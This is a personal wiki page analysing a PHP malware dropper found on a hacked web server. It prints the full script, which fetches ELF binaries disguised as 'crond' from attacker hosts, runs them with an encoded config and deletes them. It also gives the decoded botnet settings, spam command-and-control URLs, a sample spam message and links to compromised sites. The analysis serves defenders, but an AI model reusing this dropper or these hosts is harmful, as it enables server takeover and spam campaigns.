PHP Shell Exploit

From Leo's Notes
Last edited on 15 June 2020, at 00:20.
<?php
$key="1)#'ps3!U P|m[A\tyr4j6?F\nZ^C98Nng\$\\%{}wY:_Vx`e7LcGWoO\rhK>a;q0HD.&QRz~@,TM-l(5JSitk/]2bu=d\"I<BEXfv*+";

$crondElf32 ='http://pages.touchpadz.com/crond32';
$crondElf64 ='http://pages.touchpadz.com/crond64';
$xdvsnExploitEnv = 'XDVSN_SESSION_COOKIE=PnJxPDMyPi1ycTw+d3BqPD4td3BqPD53cHI8Pi13cHI8Pm52PDcyMj4tbnY8Pm5hPDMyMj4tbmE8PmBxPDAyPi1gcTw+bnc8anZ2cjgtLXFpLHZtd2FqcmNmeCxhbW8tPi1udzw+YHc8anZ2cjgtLWBjdix2bXdhanJjZngsYW1vLWNjMCxyanI+LWB3PD5xdzxqdnZyOC0tcXZjdix2bXdhanJjZngsYW1vLWVoMzEscmpyPi1xdzw+bmZgPHVgXTIyMz4tbmZgPD5paTwxOmAzMjY1OzRmO2YyMGM6LjdkMztmZjU0M2AzY2cyNDUuMzowZjtgZzE3Yzc6YDdnLjU0MzA3NWE1Y2c2MTc3MC4zYTQ7M2AwYTE6NTUxN2dhLjNjNTc1NTsyMzdkYWZnMDouYTdmNDMyNzY0OmFmNTYyLjY6OjozMjs3N2FkOzJmMmEuNDBhOjIyMDsxOjowZDoyZC4zZzRgZGQ0YDY2NmczYDJmLjQxZjA3NTA7MjQ3OmA7OzouMGAyMmdkMmQ2YzZkMzs1Zi5kMzBhNzZnMzs3NWFmNjEuNzE0NzE6N2MzYzc1MjswMC42OjM6ZzQ3NDdjYGM1Z2BjLjtmNDc3Ojc3NDo6Zjc1Ni4xMzU0MDJgNjYwN2Y0NjUyLjM0Zjc6YTIxM2ZmZzVjMy43ZDswNzQ2MjIyN2FkNDRgLjc1MTQwYWMwMDdjYWNnMmQuNGBmNWNkYTMzZjc2MDJmZi41ZzE7ZmZmYDI7MzZmNTYzLjE1NjIxMGA3NzVhMzQ1MmQuN2M3NzU6NTMwMzc0YDBgMC42MGdnMzRmZjNmM2Q0YDA3LjU7YDE7Y2A6NWc1MTA0MzsuMTthY2A3ZjIwYDQ0YTtkYy40Ozc0OzFkZzExMmc6MjdkLjVmMmcxOmFnMTJgMWZnMGEuNTJgZDU3NzYwO2AyNzs2NC41OmA3NztgMzZjMzFkMTI0LjQxYDo1NDpnNDE0ZGY7NGYuNjYwYGQ1YTMwMDs1MjY6Ni40OmM7YTs1ZDQwZ2EwOjBmLjVnNjAzNGBmMDZnMTc2YDEuNjphZzI6NzQ2Zzo3Y2YzNS4wYzA1MGNnZjUzNTE6NmZkLjc1MzphOjZkM2EyNTA6ZmAuM2MyYDszZzE0Zjs1M2YzNC43YGQ1MjsxNzE1NWZnNTQ2LjBjZzBgNjc6MjtjZzc3MmYuMzY3MDJkMzozNTdmMWFgYy40YzFnMDZkNTM3Z2Y2YTY3LmcwYzswZzoyZjMxMjQ2MC43YTIyM2Q0OjJhMmc3N2NnLjMzYDdjNzUwY2E6NjVkOi42MGdmNjA3ZDQ0YzJhZ2QwLjY1NTBnOjA1NjpnNWBnYGEuNDQ7YDpkY2c0Z2Q0N2dhOi41MmE7MzUyNTAwMjU2OjMyLmEyYTQ3OmMyM2ZnOmdmYy4xYzU2YWFmMzZjMTEyYWQ6LjdmOzpmNzVhN2FnOjEzOmAuMzIyZjJmZGM2OzMyZzNkNS41MTQxOjQ2MjJgMjE3Mjs3LjQ7ZGNmNWQ3ZjE1YDNnNi41MToyNDMxMzUzNGY3NmZjLjYyZmcxMjI7MWAwNjIzYWMuMTpkM2Y2YTMyYWE1MDthMC40NTo0YTVhMzYzYzZhNGM0LjA6Z2czZDtgMDs3ZjZkYTMuMGYzZDdnYTY0NDo0Z2djNC4wNjtnNmM6NDM2MGdkNWY6LjM1OzNmM2c6NDQ0YTA2MzYuNjdgNzMxMWM1MTIzY2MxYT4taWk8';
$systemType = php_uname('s');
$xpsvt57 = php_uname('m');

echo '<shchzzz>';
for (;;) {
	if (!function_exists('shell_exec')) {
		echo '<err step=1 err=noshex data=>';
		break;
	}
	if ($systemType !== 'Linux') {
		echo '<err step=2 err=nolinux data='.$hafev1.'>';
		break;
	}
	$targetFilename = 'crond';
	$exploitUrl = "";

	if (strlen(decbin(~0)) == 64) {
		echo '<inf step=3 data=x64>';
		$exploitUrl = $crondElf64;
	} else {
		echo '<inf step=3 data=x32>';
		$exploitUrl = $crondElf32;
	}

	$exploitFilename = "";
	if (!file_exists($targetFilename)) {
		$exploitFilename = saveUrlToFile($key, $exploitUrl, $targetFilename);

		if ( $exploitFilename == FALSE) {
			echo '<err step=4 err=downl data=>';
			break;
		} else {
			echo '<inf step=4 data=downok>';
		}
	} else {
		echo '<inf step=4 data=exists>';
	}

	chmod($exploitFilename, 0755);

	$exploitCmd = $xdvsnExploitEnv.' ./'.$exploitFilename.' >/dev/null 2>/dev/null &';
	$exploitResult = shell_exec($exploitCmd);

	echo '<inf step=5 data=done data2='.$exploitResult.'>';
	sleep(1);

	unlink($exploitFilename);

	break;
}

echo '</shchzzz>';
exit();


function getPasteFileContents($key, $url) {
	$hackFileContents = "";
	$fp = @fopen($url, 'rb');

	if ($fp == FALSE) {
		if (!function_exists('curl_init'))
			return FALSE;
			
		$curl = @curl_init();
		@curl_setopt($curl, CURLOPT_URL, $url);
		@curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
		$hackFileContents = @curl_exec($curl);
		@curl_close($curl);
	} else {
		while(!feof($fp))
			$hackFileContents.= fread($fp, 1024 * 64);
		fclose($fp);
	}
    return $hackFileContents;
}

function saveContentsToFile($key, $hackFilename, $hackFileContents) {
	$fp = fopen($hackFilename, 'wb+');

	if ($fp == FALSE) {
		if (!function_exists('file_put_contents')) return FALSE;
		if ( @file_put_contents($hackFilename, $hackFileContents) === FALSE ) return FALSE;
	} else {
		$blbem39 = fwrite($fp, $hackFileContents, strlen($hackFileContents));
		fclose($fp);
		if ($blbem39 == FALSE || $blbem39 != strlen($hackFileContents)) return FALSE;
	}
	return TRUE;
}

function saveUrlToFile($key, $url, $exploitFilename) {
	$hackFileContents = getPasteFileContents($key, $url);

	if ($hackFileContents == FALSE) return FALSE;
	
	if (saveContentsToFile($key, .'/'.$exploitFilename, $hackFileContents) == FALSE) {
		if (saveContentsToFile($key, '/tmp/'.$exploitFilename, $hackFileContents) == FALSE) {
			return FALSE;
		} else {
			return '/tmp/'.$exploitFilename;
		}
	} else {
		return .'/'.$exploitFilename;
	}
	return FALSE;
}


The attacker will see the following outputs:

<shchzzz>
<inf step=3 data=x64>
<inf step=4 data=downok>
<inf step=5 data=done data2=XXX>
</shchzzz>

where XXX is the return code of the shell exec which attempts to run:

XDVSN_SESSION_COOKIE=PnJxPDMyPi1ycTw+d3BqPD4td3BqPD53cHI8Pi13cHI8Pm52PDcyMj4tbnY8Pm5hPDMyMj4tbmE8PmBxPDAyPi1gcTw+bnc8anZ2cjgtLXFpLHZtd2FqcmNmeCxhbW8tPi1udzw+YHc8anZ2cjgtLWBjdix2bXdhanJjZngsYW1vLWNjMCxyanI+LWB3PD5xdzxqdnZyOC0tcXZjdix2bXdhanJjZngsYW1vLWVoMzEscmpyPi1xdzw+bmZgPHVgXTIyMz4tbmZgPD5paTwxOmAzMjY1OzRmO2YyMGM6LjdkMztmZjU0M2AzY2cyNDUuMzowZjtgZzE3Yzc6YDdnLjU0MzA3NWE1Y2c2MTc3MC4zYTQ7M2AwYTE6NTUxN2dhLjNjNTc1NTsyMzdkYWZnMDouYTdmNDMyNzY0OmFmNTYyLjY6OjozMjs3N2FkOzJmMmEuNDBhOjIyMDsxOjowZDoyZC4zZzRgZGQ0YDY2NmczYDJmLjQxZjA3NTA7MjQ3OmA7OzouMGAyMmdkMmQ2YzZkMzs1Zi5kMzBhNzZnMzs3NWFmNjEuNzE0NzE6N2MzYzc1MjswMC42OjM6ZzQ3NDdjYGM1Z2BjLjtmNDc3Ojc3NDo6Zjc1Ni4xMzU0MDJgNjYwN2Y0NjUyLjM0Zjc6YTIxM2ZmZzVjMy43ZDswNzQ2MjIyN2FkNDRgLjc1MTQwYWMwMDdjYWNnMmQuNGBmNWNkYTMzZjc2MDJmZi41ZzE7ZmZmYDI7MzZmNTYzLjE1NjIxMGA3NzVhMzQ1MmQuN2M3NzU6NTMwMzc0YDBgMC42MGdnMzRmZjNmM2Q0YDA3LjU7YDE7Y2A6NWc1MTA0MzsuMTthY2A3ZjIwYDQ0YTtkYy40Ozc0OzFkZzExMmc6MjdkLjVmMmcxOmFnMTJgMWZnMGEuNTJgZDU3NzYwO2AyNzs2NC41OmA3NztgMzZjMzFkMTI0LjQxYDo1NDpnNDE0ZGY7NGYuNjYwYGQ1YTMwMDs1MjY6Ni40OmM7YTs1ZDQwZ2EwOjBmLjVnNjAzNGBmMDZnMTc2YDEuNjphZzI6NzQ2Zzo3Y2YzNS4wYzA1MGNnZjUzNTE6NmZkLjc1MzphOjZkM2EyNTA6ZmAuM2MyYDszZzE0Zjs1M2YzNC43YGQ1MjsxNzE1NWZnNTQ2LjBjZzBgNjc6MjtjZzc3MmYuMzY3MDJkMzozNTdmMWFgYy40YzFnMDZkNTM3Z2Y2YTY3LmcwYzswZzoyZjMxMjQ2MC43YTIyM2Q0OjJhMmc3N2NnLjMzYDdjNzUwY2E6NjVkOi42MGdmNjA3ZDQ0YzJhZ2QwLjY1NTBnOjA1NjpnNWBnYGEuNDQ7YDpkY2c0Z2Q0N2dhOi41MmE7MzUyNTAwMjU2OjMyLmEyYTQ3OmMyM2ZnOmdmYy4xYzU2YWFmMzZjMTEyYWQ6LjdmOzpmNzVhN2FnOjEzOmAuMzIyZjJmZGM2OzMyZzNkNS41MTQxOjQ2MjJgMjE3Mjs3LjQ7ZGNmNWQ3ZjE1YDNnNi41MToyNDMxMzUzNGY3NmZjLjYyZmcxMjI7MWAwNjIzYWMuMTpkM2Y2YTMyYWE1MDthMC40NTo0YTVhMzYzYzZhNGM0LjA6Z2czZDtgMDs3ZjZkYTMuMGYzZDdnYTY0NDo0Z2djNC4wNjtnNmM6NDM2MGdkNWY6LjM1OzNmM2c6NDQ0YTA2MzYuNjdgNzMxMWM1MTIzY2MxYT4taWk8 ./tmp/crond >/dev/null 2>/dev/null &


The XDVSN_SESSION_COOKIE environment variable contains data encoded with their base64+xor function that contains the server and session IDs to use when communicating with the server. If this environment variable is missing, the program will terminate immediately.

The decoded value of the environment variable:

<ps>10</ps><urh></urh><urp></urp><lt>500</lt><lc>100</lc><bs>20</bs><lu>http://sk.touchpadz.com/</lu><bu>http://bat.touchpadz.com/aa2.php</bu><su>http://stat.touchpadz.com/gj13.php</su><ldb>wb_001</ldb><kk>38b104796d9d02a8,5f19dd761b1ae067,182d9be35a58b5e,761257c7ae43552,1c691b2c387735ec,1a75779015fcde28,c5d6105468cd740,488810955cf90d0c,62c800293882f80f,1e6bff6b444e1b0d,63d257290658b998,2b00ef0f4a4f197d,f12c54e1957cd43,5365385a1a570922,4818e6565aba7eba,9d655855688d574,317620b4425d6470,16d58c031dde7a1,5f925640005cf66b,57362ca225acae0f,6bd7afc11d5420dd,7e39dddb0914d741,374032b557c1670f,5a5578712156b2b2,42ee16dd1d1f6b25,79b39ab87e732619,39cab5d02b66c9fa,695693fe330e805f,7d0e38ce30b3de2c,70bf755429b05946,78b559b14a13f306,63b8768e636fd96d,442bf7c122970484,68a9c97f62ec282d,7e4216bd24e354b3,48ce08564e85ad17,2a272aed717384df,5718c84f1c0728db,1a0b91e36d971d16,5bf70935377de764,2ae2b45809ae550d,14520f18175d3cba,6a3e24f715ed4c45,e2a92e80d130642,5c001f680c0e55ae,11b5a572ac847f8,42ed425f66a0cef2,4772e82748e7bebc,669b8fae6ef65ec8,70c9170722074810,c0c658a01de8eda,3a74ccd14a330cf8,5d98d57c5ce8318b,100d0dfa4910e1f7,736386400b035095,69fad7f5d37b1e4,73806131716d54da,40de30093b2401ca,38f1d4c10cc729c2,6786c7c141a4c6a6,28ee1f9b295d4fc1,2d1f5ec46686eea6,249e4a86142ef7d8,1791d1e8666c2414,45b5133a7301aa3c</kk>

There are three URLs that the program will fetch data from.

  1. lu: hxxp://sk.touchpadz.com/ + /img/logo.gif?sessd=$ldb&sessc=$lc&sessk=$kk
  2. bu: hxxp://bat.touchpadz.com/aa2.php
  3. su: hxxp://stat.touchpadz.com/gj13.php

The lu URL will contain 3 parameters that are provided through the environment variable. The data returned from this source is encoded in an unknown format, but is most likely a list of email addresses.

The bu URL will return the spam message payload, encoded with the base64+xor encoder.

<USER>lula_burton</USER>
<NAME>"Lula Burton"</NAME>
<SUBJ>Fw:  Hairy pussy girl undress panties</SUBJ>
<SBODY>
<div>
<p><a href="http://www.appgott.com/wp-content/plugins/better-wp-security/modules/free/backup/js/help.php?%MAIL_EN%">Hairy pussy girl undress panties</a></p>
combat,  why  none of us would be here. Thanks guys. Mission  complete
</div>
</SBODY>

The su URL will return the exploit URL that contains the PHP spammer.

http://resiliententrepreneur.com/wp-content/cache/supercache/resiliententrepreneur.com/ajaxfilemanager/file.php


Email Links[edit | edit source]

Each spam message appears to contain random explicit words (or that it really is bad English) and one link that is hosted on an exploited server.

The user is redirected to the actual destination only if an encoded email address is found in the URI. The actual destination seems to be operated by the same operator who runs the botnet or is related to the operator since it contains an image href to:

  • hxxp://touch.touchpadz.com/empty22.gif